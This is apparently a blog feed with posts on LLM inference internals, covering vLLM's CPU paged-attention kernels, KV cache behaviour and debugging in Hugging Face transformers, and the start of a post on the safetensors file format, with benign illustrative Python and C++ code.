void reshape_and_cache(torch::Tensor& key, torch::Tensor& value,
torch::Tensor& key_cache, torch::Tensor& value_cache,
torch::Tensor& slot_mapping,
const std::string& kv_cache_dtype,
torch::Tensor& k_scale, torch::Tensor& v_scale) {
int num_tokens = key.size(0);
int num_heads = key.size(1);
int head_size = key.size(2);
int block_size = key_cache.size(3);
int x = key_cache.size(4);
int key_stride = key.stride(0);
int value_stride = value.stride(0);
DISPATCH_MACRO(key.scalar_type(), "reshape_and_cache_cpu_impl", [&] {
CPU_KERNEL_GUARD_IN(reshape_and_cache_cpu_impl)
reshape_and_cache_cpu_impl<scalar_t>(
key.data_ptr<scalar_t>(), value.data_ptr<scalar_t>(),
key_cache.data_ptr<scalar_t>(), value_cache.data_ptr<scalar_t>(),
slot_mapping.data_ptr<int64_t>(), num_tokens, key_stride, value_stride,
num_heads, head_size, block_size, x);
CPU_KERNEL_GUARD_OUT(reshape_and_cache_cpu_impl)
});
}
</code></pre></div></div>
<p>This ends up in reshape_and_cache_cpu_impl, which essentially uses slot_mapping to find each token's slot in the physical blocks and writes the current K/V into that slot, roughly like this:</p>
<p><img src="/assets/img/vllmpageattn/7.png" alt="" /></p>
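<p>The write can be sketched as a scatter operation, here in numpy with a deliberately simplified cache layout (the real CPU kernel additionally splits head_size into x-sized chunks, which this sketch ignores):</p>

```python
import numpy as np

num_blocks, block_size, num_heads, head_size = 4, 2, 1, 3
# Simplified layout: one row per slot, i.e. [num_blocks * block_size, num_heads, head_size]
key_cache = np.zeros((num_blocks * block_size, num_heads, head_size))

key = np.ones((3, num_heads, head_size))  # K vectors of 3 incoming tokens
slot_mapping = [6, 7, 2]                  # hypothetical precomputed slots

for i, slot in enumerate(slot_mapping):
    key_cache[slot] = key[i]              # scatter each token's K into its slot

print(key_cache[:, 0, 0])  # slots 2, 6, 7 are filled, the rest stay zero
```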
<p>After writing the current K/V into the KV cache, TorchSDPABackendImpl.forward calls the appropriate function depending on the phase. In the prefill phase it calls self._run_sdpa_forward, which does not need to consult earlier K/V and computes the attention on its own. PagedAttention.forward_decode computes the attention in the decode phase; as we know, decode attention depends on all previous K/V, so it references the earlier K/V.</p>
<p>Let's first look at the arguments of PagedAttention.forward_decode; three important ones are obtained from decode_meta.get_seq_len_block_table_args.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
if decode_meta := attn_metadata.decode_metadata:
assert attn_type != AttentionType.ENCODER_ONLY, (
"Encoder-only models should not have decode metadata.")
# Decoding run.
(
seq_lens_arg,
max_seq_len_arg,
block_tables_arg,
) = decode_meta.get_seq_len_block_table_args(attn_type)
PagedAttention.forward_decode(
output[attn_metadata.num_prefill_tokens:, :, :],
query[attn_metadata.num_prefill_tokens:, :, :],
key_cache,
value_cache,
block_tables_arg,
seq_lens_arg,
max_seq_len_arg,
self.kv_cache_dtype,
self.num_kv_heads,
self.scale,
self.alibi_slopes,
layer._k_scale,
layer._v_scale,
)
</code></pre></div></div>
<p>seq_lens_arg is the list of lengths of the seqs in this seq group that are in the decode state.
max_seq_len_arg is the length of the longest seq in this seq group.
block_tables_arg holds the block_table of each seq in the seq group (note that the blocks here are actually physical block IDs). Some seqs' block tables may be longer than others', so the shorter ones need to be padded to the longest length.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
block_tables = make_tensor_with_pad(
    self.input_data.decode_block_tables,
    pad=0,
    dtype=torch.int32,
    device="cpu",
)

def make_tensor_with_pad(
    x: list[list[T]],
    pad: T,
    dtype: torch.dtype,
    *,
    max_len: Optional[int] = None,
    device: Optional[Union[str, torch.device]] = None,
    pin_memory: bool = False,
) -> torch.Tensor:
    """
    Make a padded tensor from 2D inputs.
    The padding is applied to the end of each inner list until it reaches
    `max_len`.
    """
    np_dtype = TORCH_DTYPE_TO_NUMPY_DTYPE[dtype]
    padded_x = make_ndarray_with_pad(x, pad, np_dtype, max_len=max_len)
    tensor = torch.from_numpy(padded_x).to(device)
    if pin_memory:
        tensor = tensor.pin_memory()
    return tensor
</code></pre></div></div>
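<p>The effect of the padding can be illustrated with a small numpy sketch; the function name and the block-table values here are illustrative, not vLLM code:</p>

```python
import numpy as np

def pad_block_tables(tables, pad=0):
    # Pad every per-seq block table to the length of the longest one,
    # mirroring what make_tensor_with_pad does before building the tensor.
    max_len = max(len(t) for t in tables)
    return np.array([t + [pad] * (max_len - len(t)) for t in tables])

print(pad_block_tables([[7, 2, 9], [5], [3, 1]]))
# [[7 2 9]
#  [5 0 0]
#  [3 1 0]]
```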
<p>With these three arguments ready, PagedAttention.forward_decode is called; it goes through ops.paged_attention_v1 -> torch.ops._C.paged_attention_v1 to paged_attention_v1 in csrc/cpu/attention.cpp, then into the call member function of paged_attention_v1_impl. The full attention computation is too complex and I have not fully understood the code yet, so here we only look briefly at how the KV cache stored in the physical blocks is located.</p>
<p>The code below sits in a big loop that handles each seq. Each seq's length is stored in the seq_lens array and its block table in seq_block_table; given the number of blocks the seq occupies (block_num), we can find the seq's physical block IDs and thus its KV cache.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
int max_seq_len = max_num_blocks_per_seq * BLOCK_SIZE;
int max_seq_len_padded = (max_seq_len + 15) & 0xFFFFFFF0;
TORCH_CHECK((max_seq_len_padded * sizeof(float)) % 64 == 0);
const int parallel_work_item_num = omp_get_max_threads();
size_t logits_bytes =
parallel_work_item_num * max_seq_len_padded * sizeof(float);
float* logits = (float*)std::aligned_alloc(
64, logits_bytes); // Cacheline alignment for each context token.
// [parallel_work_item_num, max_seq_len_padded]
#pragma omp parallel for collapse(2) schedule(dynamic, 1)
for (int seq_idx = 0; seq_idx < num_seqs; ++seq_idx) {
for (int head_idx = 0; head_idx < num_heads; ++head_idx) {
int seq_len = seq_lens[seq_idx];
const int* seq_block_table =
block_tables + max_num_blocks_per_seq * seq_idx;
const int block_num = (seq_len + BLOCK_SIZE - 1) / BLOCK_SIZE;
const int64_t kv_head_idx = head_idx / num_queries_per_kv;
const scalar_t* __restrict__ q_vec_ptr =
q + seq_idx * q_stride + head_idx * HEAD_SIZE;
const int last_block_token_num = seq_len - (block_num - 1) * BLOCK_SIZE;
float* __restrict__ thread_block_logits =
logits + omp_get_thread_num() * max_seq_len_padded;
// Compute logits
for (int block_idx = 0; block_idx < block_num; ++block_idx) {
const int64_t physical_block_idx = seq_block_table[block_idx];
const scalar_t* __restrict__ k_block_cache_ptr =
k_cache + physical_block_idx * kv_block_stride +
kv_head_idx * kv_head_stride;
float* __restrict__ head_block_logits =
thread_block_logits + block_idx * BLOCK_SIZE;
reduceQKBlockKernel<scalar_t, HEAD_SIZE, BLOCK_SIZE, x>::call(
q_vec_ptr, k_block_cache_ptr, head_block_logits, scale,
block_idx == block_num - 1 ? last_block_token_num : BLOCK_SIZE);
}
...
</code></pre></div></div>
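<p>The addressing in the loop above can be translated into a short Python sketch; the sequence length and block IDs are illustrative values:</p>

```python
# For one sequence, walk its block table and locate each K block in the cache.
BLOCK_SIZE = 4
seq_len = 10
seq_block_table = [7, 2, 9]  # hypothetical physical block IDs of this seq

block_num = (seq_len + BLOCK_SIZE - 1) // BLOCK_SIZE
for block_idx in range(block_num):
    physical_block_idx = seq_block_table[block_idx]
    # The last block may be only partially filled.
    token_num = (seq_len - (block_num - 1) * BLOCK_SIZE
                 if block_idx == block_num - 1 else BLOCK_SIZE)
    print(physical_block_idx, token_num)
```

<p>Each physical_block_idx plays the role of the base offset into k_cache in the C++ kernel above.</p>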
Analysis and debugging of the KV cache in the transformers library2025-05-11T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2025/05/11/kvcache-intro
<p>This article records what the KV cache actually caches and why it works. While studying it, two questions puzzled me for a long time.</p>
<ol>
<li>Why is it said that only causal models can use a KV cache?</li>
<li>The default code in transformers does not seem to use a causal mask.</li>
</ol>
<h2> How the KV cache works </h2>
<p>As we know, a key step in a transformer is self-attention, which is implemented via Q, K, and V. Without going into the deeper meaning of QKV here, the intuition is that the input tokens pass through three linear transformations to become three matrices Q, K, V with the same dimensions as the original input. The attention formula below then computes a vector with the same dimensions as the original input, which encodes the relationships between the tokens.</p>
<p><img src="/assets/img/kvcache/1.png" alt="" /></p>
<p>Let's refine this process to see why a KV cache is possible. The division by sqrt(dk) and the softmax are not the point; the point is the three matrix multiplications.
First, how Q, K, V are produced. Below, S is a [3, 4] matrix and W is a [4, 4] matrix. The 3 is the sequence length, i.e. the number of tokens; W holds trained parameters, loaded from safetensors at inference time.</p>
<p><img src="/assets/img/kvcache/2.png" alt="" /></p>
<p>This computation produces the Q matrix, and the K and V matrices are produced the same way. First, look at Q multiplied by the transpose of K.</p>
<p><img src="/assets/img/kvcache/3.png" alt="" /></p>
<p>This gives a [seq_len, seq_len] matrix, the self-attention weight matrix over the tokens, where Q1 and K1 are rows of Q and K. Multiplying by V then gives the final self-attention output.</p>
<p><img src="/assets/img/kvcache/4.png" alt="" /></p>
<p>Now let's see how the attention weight matrix and the attention output change after one more row is added. When a row is appended, Q, K, and V each gain a row, and you can see the attention matrix grows by one row and one column at its edges.</p>
<p><img src="/assets/img/kvcache/5.png" alt="" /></p>
<p>The self-attention output:</p>
<p><img src="/assets/img/kvcache/6.png" alt="" /></p>
<p>Red marks what changed.</p>
<p>The KV cache essentially stores the K and V values computed at every layer for each token, so that when the next token is generated, the self-attention output can be computed incrementally; these are the black parts (the old K and V) of the K and V matrices above.</p>
<p>When I first looked into the KV cache, most articles said it only applies to decoder-only models, because they have an attention mask, usually called a causal mask: a lower-triangular matrix that masks out the upper triangle of the attention weights. The masking exists because in a decoder-only model each token only needs to attend to earlier tokens; earlier tokens do not attend to later ones.</p>
<p>When I first looked at Q times K transposed, the causal mask seemed useless to me, so I kept searching for the strong connection between the KV cache and the causal mask, until I read <a href="https://blog.csdn.net/daihaoguang/article/details/141515660">GLM-4 (6) - KV Cache / Prefill & Decode</a> and finally understood. Although the QK^T product can be computed incrementally from the new token, once it is multiplied by V, every element of the attention output changes. In fact, after the softmax that follows QK^T, the attention weight matrix has already changed everywhere.</p>
<p>Now with a causal mask. Again, assume three tokens at first, with their Q, K, V computed in one shot.</p>
<p><img src="/assets/img/kvcache/7.png" alt="" /></p>
<p><img src="/assets/img/kvcache/8.png" alt="" /></p>
<p>Appending one row:</p>
<p><img src="/assets/img/kvcache/9.png" alt="" /></p>
<p><img src="/assets/img/kvcache/10.png" alt="" /></p>
<p>We can see that with the causal mask, the self-attention output can also grow incrementally, one token at a time. The incremental attention output then goes through the rest of the transformer on its own and finally yields the next token.
From the matrices above we can also see that the attention output depends on all the historical K and V, so we store the historical K and V: this is the KV cache, which is really two caches. Note that a transformer usually has many layers, each computing its own self-attention, so every layer has its own KV cache.</p>
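<p>A minimal per-layer KV cache can be sketched as follows; this is an illustrative toy in numpy, not the transformers implementation:</p>

```python
import numpy as np

class SimpleKVCache:
    """One (K, V) pair per transformer layer, grown on every decode step."""

    def __init__(self, num_layers):
        self.key_cache = [None] * num_layers
        self.value_cache = [None] * num_layers

    def update(self, layer, k, v):
        # Append this step's k/v to the layer's cached K/V and return the full K/V.
        if self.key_cache[layer] is None:
            self.key_cache[layer], self.value_cache[layer] = k, v
        else:
            self.key_cache[layer] = np.concatenate([self.key_cache[layer], k])
            self.value_cache[layer] = np.concatenate([self.value_cache[layer], v])
        return self.key_cache[layer], self.value_cache[layer]

cache = SimpleKVCache(num_layers=2)
cache.update(0, np.ones((3, 4)), np.ones((3, 4)))         # prefill: 3 tokens
k, v = cache.update(0, np.ones((1, 4)), np.ones((1, 4)))  # decode: 1 new token
print(k.shape)  # (4, 4): the new token's attention sees all 4 cached K rows
```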
<h2> A simple KV cache example </h2>
<p>The above was theory; in this section we get a feel for the role of the KV cache through a simple example.
Based on the code in this <a href="https://github.com/huangjia2019/llm-gpt/tree/main/05_Attention">repository</a>, our test code is as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
import numpy as np  # import the numpy library

def get_attn_subsequent_mask(seq):
    #------------------------- Shape info --------------------------------
    # seq has shape [batch_size, seq_len(Q)=seq_len(K)]
    #---------------------------------------------------------------------
    # Get the shape of the input sequence
    attn_shape = [seq.size(0), seq.size(1), seq.size(1)]
    #------------------------- Shape info --------------------------------
    # attn_shape describes [batch_size, seq_len(Q), seq_len(K)]
    #---------------------------------------------------------------------
    # Use numpy to create an upper-triangular matrix (triu = triangle upper)
    subsequent_mask = np.triu(np.ones(attn_shape), k=1)
    #------------------------- Shape info --------------------------------
    # subsequent_mask has shape [batch_size, seq_len(Q), seq_len(K)]
    #---------------------------------------------------------------------
    # Convert the numpy array to a PyTorch tensor with boolean dtype
    subsequent_mask = torch.from_numpy(subsequent_mask).bool()
    #------------------------- Shape info --------------------------------
    # The returned subsequent_mask has shape [batch_size, seq_len(Q), seq_len(K)]
    #---------------------------------------------------------------------
    return subsequent_mask  # return the attention mask for subsequent positions

import torch
import torch.nn.functional as F

# A tensor x of shape (batch_size, seq_len, feature_dim)
x = torch.randn(2, 3, 4)  # shape (batch_size, seq_len, feature_dim)
# Linear layers to project x into Q, K, V vectors
linear_q = torch.nn.Linear(4, 4)
linear_k = torch.nn.Linear(4, 4)
linear_v = torch.nn.Linear(4, 4)
# Compute Q, K, V via the linear layers
Q = linear_q(x)  # shape (batch_size, seq_len, feature_dim)
K = linear_k(x)  # shape (batch_size, seq_len, feature_dim)
V = linear_v(x)  # shape (batch_size, seq_len, feature_dim)
# Dot product of Q and K as similarity scores, i.e. the raw attention weights
raw_weights = torch.bmm(Q, K.transpose(1, 2))  # shape (batch_size, seq_len, seq_len)
# Scale the raw attention weights
scale_factor = K.size(-1) ** 0.5  # here 4 ** 0.5
scaled_weights = raw_weights / scale_factor  # shape (batch_size, seq_len, seq_len)
# Apply the causal mask, then softmax-normalize to get the attention weights
scaled_weights.masked_fill_(get_attn_subsequent_mask(x), -1e9)
attn_weights = F.softmax(scaled_weights, dim=2)
# attn_weights = F.softmax(scaled_weights, dim=2)  # shape (batch_size, seq_len, seq_len)
# Apply the attention weights to V to compute the weighted sum
attn_outputs = torch.bmm(attn_weights, V)  # shape (batch_size, seq_len, feature_dim)
print("attention weights of x:", attn_weights)
print("attention output of x:", attn_outputs)

y = torch.rand(2, 1, 4)
z = torch.cat((x, y), 1)
Qz = linear_q(z)
Kz = linear_k(z)
Vz = linear_v(z)
raw_weights1 = torch.bmm(Qz, Kz.transpose(1, 2))
scale_factor1 = Kz.size(-1) ** 0.5
scaled_weights1 = raw_weights1 / scale_factor1
scaled_weights1.masked_fill_(get_attn_subsequent_mask(z), -1e9)
attn_weights1 = F.softmax(scaled_weights1, dim=2)
attn_outputs1 = torch.bmm(attn_weights1, Vz)  # shape (batch_size, seq_len, feature_dim)
print("attention weights of z:", attn_weights1)
print("attention output of z:", attn_outputs1)
</code></pre></div></div>
<p>The code above randomly generates a matrix x with batch_size 2, 3 tokens, and embed_size 4, then computes its attention weight matrix and attention output, using the get_attn_subsequent_mask function to obtain the causal mask.</p>
<p><img src="/assets/img/kvcache/11.png" alt="" /></p>
<p>You can see that after one token (y) is appended, the attention output gains only one row, the attention output of the new y; the remaining attention outputs are unchanged.</p>
<p>This example essentially shows how tokens are processed with a KV cache: the prompt as a whole is fed in as input (x), the KV cache is produced and the first token is generated; then the new token (y) alone goes through the transformer to generate the next token.
Next, let's actually debug what happens inside transformers.</p>
<h2> Analyzing the KV cache in transformers </h2>
<p>In this section we debug transformers with and without the KV cache, again using the DeepSeek-R1-Distill-Qwen-1.5B model.</p>
<p>Let's first look at the no-cache case. transformers now uses the KV cache by default, so we need to pass use_cache=False when calling AutoModelForCausalLM.from_pretrained. The full code is as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Load model directly
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("F:\\model\\DeepSeek-R1-Distill-Qwen-1.5B")
model = AutoModelForCausalLM.from_pretrained("F:\\model\\DeepSeek-R1-Distill-Qwen-1.5B", use_cache=False)
input_text = "who are you?"
input_ids = tokenizer(input_text, return_tensors="pt").to(model.device)
with torch.no_grad():
    outputs = model.generate(input_ids=input_ids.input_ids, max_length=50, pad_token_id=tokenizer.pad_token_id, use_cache=False)
output_text = tokenizer.decode(outputs[0], skip_special_tokens=True)
print(output_text)
</code></pre></div></div>
<p>Set a breakpoint at model.generate and start stepping with F11.
First, note the following: generating the first token from the prompt is called prefill, and generating tokens after that is called decode. Below, the initial prefill is about to start.</p>
<p><img src="/assets/img/kvcache/12.png" alt="" /></p>
<p>Step into Qwen2Model's forward: you can see 5 tokens are fed in here.</p>
<p><img src="/assets/img/kvcache/13.png" alt="" /></p>
<p>Step into Qwen2Attention's forward and down into sdpa_attention_forward.</p>
<p><img src="/assets/img/kvcache/14.png" alt="" /></p>
<p>You can see the self-attention of the 5 tokens being computed here; multiple heads are used, but the principle is the same as with a single head.
Next, the decode phase begins.</p>
<p><img src="/assets/img/kvcache/15.png" alt="" /></p>
<p>Note that all 6 tokens (the 5 from the prompt plus the newly generated one) are passed in directly.
Look at the attention computation:</p>
<p><img src="/assets/img/kvcache/16.png" alt="" /></p>
<p>As you can see, all 6 tokens are involved in the computation. So without a KV cache, every inference step recomputes the self-attention of all tokens.</p>
<p>Now let's look at the KV cache case.
The code is as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
# Load model directly
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("F:\\model\\DeepSeek-R1-Distill-Qwen-1.5B")
model = AutoModelForCausalLM.from_pretrained("F:\\model\\DeepSeek-R1-Distill-Qwen-1.5B")
input_text = "who are you?"
input_ids = tokenizer(input_text, return_tensors="pt").to(model.device)
with torch.no_grad():
    outputs = model.generate(input_ids=input_ids.input_ids, max_length=50, pad_token_id=tokenizer.pad_token_id)
output_text = tokenizer.decode(outputs[0], skip_special_tokens=True)
print(output_text)
</code></pre></div></div>
<p>In the prefill phase, with use_cache enabled, the KV cache is saved in past_key_value, one per layer.</p>
<p><img src="/assets/img/kvcache/17.png" alt="" /></p>
<p><img src="/assets/img/kvcache/18.png" alt="" /></p>
<p>Essentially, there is one key_cache and one value_cache per layer.</p>
<p><img src="/assets/img/kvcache/19.png" alt="" /></p>
<p>Now into decode; note that only one token is fed into the model this time.</p>
<p><img src="/assets/img/kvcache/20.png" alt="" /></p>
<p>When computing self-attention, only the current token's Q is used, together with all the K and V.</p>
<p><img src="/assets/img/kvcache/21.png" alt="" /></p>
<p>The K and V here are the concatenation of the previous K/V with this step's k/v, so the cached KV matrices are indeed used.</p>
<p>At this point another question may arise: without a KV cache, the decode input has length seq len, but with the KV cache, decode gets only one token. Does the model lose information as this runs through the whole transformer? It does not: from the structure below, each layer's input is still 1536-dimensional, i.e. the token embedding, and as the attention computation shows, this input only depends on the current token's Q plus the K/V of all the tokens before it and its own K/V.</p>
<p><img src="/assets/img/kvcache/22.png" alt="" /></p>
<p>During debugging, we can also see that each forward pass actually produces the next-token probabilities for every token position.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("F:\\model\\DeepSeek-R1-Distill-Qwen-1.5B")
model = AutoModelForCausalLM.from_pretrained("F:\\model\\DeepSeek-R1-Distill-Qwen-1.5B", use_cache=False)
print(model)
input_text = "who are you?"
input_ids = tokenizer(input_text, return_tensors="pt").to(model.device)
with torch.no_grad():
    outputs = model(**input_ids, output_hidden_states=True)
logits = outputs.logits
logits = logits.squeeze(0)  # shape becomes (sequence_length, vocab_size)
# Take the highest-probability token ID at each position
predicted_token_ids = torch.argmax(logits, dim=-1)  # shape (sequence_length,)
# Decode all predicted tokens
predicted_tokens = tokenizer.batch_decode(predicted_token_ids, skip_special_tokens=True)
# Print the prediction at each position
for idx, token in enumerate(predicted_tokens):
    print(f"Position {idx}: {token}")
</code></pre></div></div>
<p>The output looks like this:</p>
<p><img src="/assets/img/kvcache/23.png" alt="" /></p>
<p>This says that for the first token (start_of_sentence) the most probable next token is ")\n\n"; for the two tokens '[sos] who' the next token is 'is'; and for the 5 tokens '[sos] who are you?' the most probable next token is 'what'. For each token, the model computes its attention over all preceding tokens, and this attention is what captures the inter-token relationships that traditional RNNs modeled.</p>
<p>While studying the causal mask, I found that attn_mask was always empty during the self-attention computation, as in the figure below, which did not match my expectation.</p>
<p><img src="/assets/img/kvcache/24.png" alt="" /></p>
<p>After digging for a long time, I finally found that others had the same <a href="https://github.com/huggingface/transformers/issues/29668">question</a>, and discovered that when the is_causal argument of torch.nn.functional.scaled_dot_product_attention is True, the function handles the causal mask itself. See the reference implementation <a href="https://docs.pytorch.org/docs/stable/generated/torch.nn.functional.scaled_dot_product_attention.html">here</a>, where the familiar code appears.</p>
<p><img src="/assets/img/kvcache/25.png" alt="" /></p>
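<p>The effect of is_causal can be reproduced with a plain numpy sketch of scaled dot-product attention; this illustrates the idea rather than torch's actual kernel:</p>

```python
import numpy as np

def sdpa(q, k, v, is_causal=False):
    # Scaled dot-product attention; with is_causal, mask the upper triangle
    # with a large negative value before softmax, as the torch function does.
    scores = q @ k.T / np.sqrt(q.shape[-1])
    if is_causal:
        mask = np.triu(np.ones(scores.shape, dtype=bool), k=1)
        scores = np.where(mask, -1e9, scores)
    weights = np.exp(scores - scores.max(-1, keepdims=True))
    weights /= weights.sum(-1, keepdims=True)
    return weights @ v

rng = np.random.default_rng(0)
q = k = v = rng.standard_normal((3, 4))
out = sdpa(q, k, v, is_causal=True)
# Row 0 may only attend to itself, so its output equals v[0].
assert np.allclose(out[0], v[0])
```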
<p>If we switch the attention implementation to eager, we can see the causal mask being computed explicitly.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
model = AutoModelForCausalLM.from_pretrained("F:\\model\\DeepSeek-R1-Distill-Qwen-1.5B", use_cache=False, attn_implementation='eager')
</code></pre></div></div>
<p>In eager_attention_forward you can see that after softmax, attn_weight takes on the lower-triangular pattern.</p>
<p><img src="/assets/img/kvcache/26.png" alt="" /></p>
<h2> Summary </h2>
<p>This wraps up our brief analysis of the KV cache in transformers; let's close with a few questions.</p>
<ol>
<li>
<p>Why can only causal models use a KV cache?</p>
<p>Because in a causal model the sequence attention mask makes a new token's attention depend only on its own QKV and the K/V of the historical tokens.</p>
</li>
<li>
<p>Why is there no Q cache?</p>
<p>As the analysis above shows, the historical Q is never used again, so storing it would be pointless.</p>
</li>
<li>
<p>The default transformers code does not use a causal mask?</p>
<p>It does; the mask is applied inside the PyTorch framework function.</p>
</li>
</ol>
<h2> Ref </h2>
<p><a href="https://blog.csdn.net/daihaoguang/article/details/141515660">GLM-4 (6) - KV Cache / Prefill & Decode</a></p>
<p><a href="https://zhuanlan.zhihu.com/p/662498827">大模型推理加速:看图学KV Cache</a></p>
<p><a href="https://www.cnblogs.com/rossiXYZ/p/18799503">探秘Transformer系列之(20)— KV Cache</a></p>
<p><a href="https://github.com/huggingface/transformers/issues/29668">We don’t need attention_mask in sdpa implementation?</a></p>
How do large models perform inference? A bit of code debugging and analysis of the transformers library2025-05-04T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2025/05/04/how-llm-inference
<h2> Background </h2>
<p>I have been learning about LLMs recently. There is plenty of material online, much of it long expositions of theory stacked with formulas and charts. Those matter, of course, but systematic code analysis and debugging would give beginners a much more direct feel, and such material is scarce and scattered. This article tries to analyze one inference pass of a large model by debugging the transformers library, so that beginners can understand the essential process of inference. The figure below shows the basic flow of one inference pass: the initial prompt goes through the tokenizer and embedding, turning the input characters into vectors; after one forward pass through the model's network, a tensor of vocab size is produced, where each entry represents that word's probability; finally the token with the highest probability is chosen as the next token.</p>
<p><img src="/assets/img/llminference/1.png" alt="" /></p>
<p>This article analyzes this flow at the code level.
Concretely, it covers the following parts:</p>
<ol>
<li>Using a large model via transformers. While doing so, we raise three questions: what exactly is the model file? How is the model file loaded into the model? And what does the structure of a concrete model such as Qwen look like? These are answered in turn in the following sections.</li>
<li>Analysis of the safetensors model file</li>
<li>How the safetensors model file is loaded into the model</li>
<li>The overall inference flow of the model</li>
</ol>
<p>The model used in this article is DeepSeek-R1-Distill-Qwen-1.5B, which can run on a CPU.</p>
<h2> Using a large model via transformers </h2>
<p>The example below generates a string. From the output you can see it picks the most probable word at each step.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Load model directly
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("F:\\model\\DeepSeek-R1-Distill-Qwen-1.5B")
model = AutoModelForCausalLM.from_pretrained("F:\\model\\DeepSeek-R1-Distill-Qwen-1.5B")
input_text = "who are you?"
input_ids = tokenizer(input_text, return_tensors="pt").to(model.device)
with torch.no_grad():
outputs = model.generate(input_ids=input_ids.input_ids, max_length=50, pad_token_id=tokenizer.pad_token_id)
output_text = tokenizer.decode(outputs[0], skip_special_tokens=True)
print(output_text)
</code></pre></div></div>
<p><img src="/assets/img/llminference/2.png" alt="" /></p>
<p>By calling the model directly, we can generate the single next token with the highest probability.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Load model directly
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("F:\\model\\DeepSeek-R1-Distill-Qwen-1.5B")
model = AutoModelForCausalLM.from_pretrained("F:\\model\\DeepSeek-R1-Distill-Qwen-1.5B")
input_text = "who are you?"
input_ids = tokenizer(input_text, return_tensors="pt").to(model.device)
with torch.no_grad():
outputs = model(**input_ids, output_hidden_states=True)
logits = outputs.logits
# take the logits at the last position (causal LM: predict the next token)
next_token_logits = logits[0, -1, :]
# take the highest-probability token (greedy decoding)
next_token_id = torch.argmax(next_token_logits).unsqueeze(0)
# decode the single token -> text
next_token_text = tokenizer.decode(next_token_id, skip_special_tokens=True)
print(f"Next predicted token: {next_token_text}")
</code></pre></div></div>
<p><img src="/assets/img/llminference/3.png" alt="" /></p>
<p>Let's now dig into this code to explore how the model runs. Clearly, for the code above to work, the following must happen:</p>
<ol>
<li>The model parameters are loaded</li>
<li>The tokenized input flows through the network</li>
<li>The concrete computation takes place</li>
</ol>
<p>To understand how the model parameters are loaded, we first need to analyze the model file.</p>
<h2> Analyzing the safetensors model file </h2>
<p>The largest files in a model are the safetensors files, such as the one below; larger models can have dozens of them.</p>
<p><img src="/assets/img/llminference/4.png" alt="" /></p>
<p>This section analyzes the safetensors file in detail. Below is a simple program that saves tensors to a safetensors file.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># install dependencies (if not already installed)
# pip install safetensors torch
import torch
from safetensors.torch import save_file
# create example tensors
tensor1 = torch.randn(3, 4) # fully connected layer weight
tensor2 = torch.ones(3) # bias term
tensor3 = torch.tensor([[1.0, 2.0], [3.0, 4.0]]) # another tensor
# put the tensors into a dict (key names are arbitrary)
tensors = {
"fc1.weight": tensor1,
"fc1.bias": tensor2,
"custom_tensor": tensor3
}
# save as a safetensors file
save_file(tensors, "example.safetensors")
# (optional) verify the file exists and can be loaded
from safetensors.torch import load_file
loaded_tensors = load_file("example.safetensors")
print("Loaded tensors:", loaded_tensors.keys())
</code></pre></div></div>
<p>Open example.safetensors directly; the safetensors file format is shown in the figure below:</p>
<p><img src="/assets/img/llminference/5.png" alt="" /></p>
<p>Let's analyze example.safetensors against this diagram. The format is simply a straightforward serialization of tensors.</p>
<p><img src="/assets/img/llminference/6.png" alt="" /></p>
<p>As shown above, the header size of this file is 0xC8, so the data section starts at 0xD0. The header, which starts at offset 0x08, is just JSON; each tensor entry looks like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{
"tensor1": {
"dtype": "F32",
"shape": [3, 3],
"data_offsets": [0, 36]
},
"tensor2": {
"dtype": "I64",
"shape": [2],
"data_offsets": [36, 52]
}
}
</code></pre></div></div>
<p>dtype is the data type, shape is the tensor shape, and data_offsets gives the data's offset within the data section. For example, custom_tensor in example.safetensors has offsets 0-16, meaning its data spans 0xD0 through 0xDF in F32 format. Asking an LLM to decode the bytes confirms that the data is correct.</p>
<p><img src="/assets/img/llminference/7.png" alt="" /></p>
<p><img src="/assets/img/llminference/8.png" alt="" /></p>
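<p>The layout just described (an 8-byte little-endian header length, a JSON header, then raw tensor data) can be exercised with a minimal standard-library sketch. This is a simplified round-trip for illustration only; the real format allows header padding, so use the safetensors library in practice.</p>

```python
import json
import struct

def write_minimal_safetensors(path, name, floats):
    # F32 payload, little-endian
    data = struct.pack("<%df" % len(floats), *floats)
    header = {name: {"dtype": "F32", "shape": [len(floats)],
                     "data_offsets": [0, len(data)]}}
    hjson = json.dumps(header).encode("utf-8")
    with open(path, "wb") as f:
        f.write(struct.pack("<Q", len(hjson)))  # 8-byte header size
        f.write(hjson)                          # JSON header
        f.write(data)                           # data section

def read_header(path):
    with open(path, "rb") as f:
        (hsize,) = struct.unpack("<Q", f.read(8))
        header = json.loads(f.read(hsize))
        payload = f.read()
    return header, payload

write_minimal_safetensors("toy.safetensors", "custom_tensor",
                          [1.0, 2.0, 3.0, 4.0])
header, payload = read_header("toy.safetensors")
start, end = header["custom_tensor"]["data_offsets"]
values = struct.unpack("<4f", payload[start:end])
print(header)
print(values)   # (1.0, 2.0, 3.0, 4.0)
```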
<p>The code below prints the parameters of the DeepSeek-R1-Distill-Qwen-1.5B model.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>from safetensors import safe_open
